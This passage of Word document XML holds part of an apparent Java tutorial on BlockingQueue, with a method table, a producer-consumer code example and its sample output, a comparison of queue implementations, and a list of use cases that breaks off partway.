      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="2EFD72CE" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DCEFE3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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38FBCD3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2267033F" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C2A13E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E e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="054AD20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s an element if space is available, otherwise throws IllegalStateException.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="19B99E99" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64F4590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offer(E e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D087D3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Adds an element if possible, returns false if the queue is full.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="2374B50E" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01061CB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ut(E e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628856B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Inserts the element, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>waiting if necessary</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for space to become available.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="7BD8531F" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F52ACF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take()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C208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Retrieves and removes the head, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>waiting if necessary</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> until an element becomes available.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="340124FD" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F9C45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oll(long timeout, TimeUnit unit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CEF50F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trieves and removes the head, waiting up to the specified time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="62B1146D" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF4C61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mainingCapacity()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B5F50F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Returns the </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>number of additional elements</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> that this queue can accept.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="16B303D6" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E69827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drainTo(Collection&lt;? super E&gt; c)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70C0275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Removes all available elements and adds them to the specified collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CA6F5B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41D52528">
          <v:rect id="_x0000_i7106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2C760B"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4. Example: Producer-Consumer Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B96F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mport java.util.concurrent.ArrayBlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55038D6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mport java.util.concurrent.BlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04537DA9" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1208717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ublic class BlockingQueueExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4ECF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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733B5A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reating a blocking queue with a capacity of 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CD373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BlockingQueue&lt;String&gt; queue = new ArrayBlockingQueue&lt;&gt;(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC0782" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A48C7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Producer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519E84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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF05B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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3216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for (int i = 1; i &lt;= 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86228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ystem.out.println("Producing: Item" + i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8276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queue.put("Item" + i);  // Adds item, waits if full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D873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sleep(100);       // Simulating some delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A3F0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70D0996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atch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9AD90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currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08854AF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7C98F8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art();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13818D55" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C17B9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onsumer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65247E9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new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418915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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D6CF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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599DA7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ring item = queue.take();  // Retrieves item, waits if empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F74A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ystem.out.println("Consuming: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C027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sleep(200);           // Simulating processing time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C66A9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44F4E07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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154813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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ECD24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154AA37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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EC74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13DF5D8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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13A96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28FF36F1">
          <v:rect id="_x0000_i7107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57D34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5. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1052120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1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378992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1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D24FB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2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648052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3  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F995E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2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F9CE9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4  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277256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Producing: Item5  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2191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Consuming: Item3  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE93DD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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5C9E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producer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>waits</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the queue is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E8AE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The consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>waits</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0933119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61EB72FF">
          <v:rect id="_x0000_i7108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737842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6. BlockingQueue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4"/>
        <w:gridCol w:w="8070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="23F946B1" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D4ECDB"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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8F8BF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haracteristics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="3BA89F3F" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D19C47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rrayBlockingQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50933D6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Fixed-size queue backed by an array. Uses a </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>single lock</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for both put and take.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="56928567" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF1F82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LinkedBlockingQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C98F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Optionally bounded queue backed by a </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>linked list</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. Uses separate locks for put and take, allowing higher concurrency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="50E7FD25" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E1495D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iorityBlockingQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C50F4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n </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unbounded priority queue</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> where elements are ordered by their natural ordering or a provided comparator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="3301D0A1" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE752E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SynchronousQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B6529C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capacity. Each insert operation must wait for a corresponding remove operation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="6CB081DC" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67AD6F9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DelayQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039E585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 queue where elements can only be taken when their </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>delay has expired</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="2D1A470B" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A72B6D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LinkedTransferQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDDB29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upports </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>transfer()</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> method where producers wait for consumers to take the element.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64243D3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20A78A5D">
          <v:rect id="_x0000_i7109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C9CF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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E04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oducer-Consumer Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Efficiently managing tasks between producer and consumer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037ADCE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ask Queuing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Queueing tasks in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78644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lastRenderedPageBreak/>
        <w:t>Message Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Storing messages that need to be processed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAD42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Event Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handling real-time events where multiple producers and consumers are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58999B0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Pools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
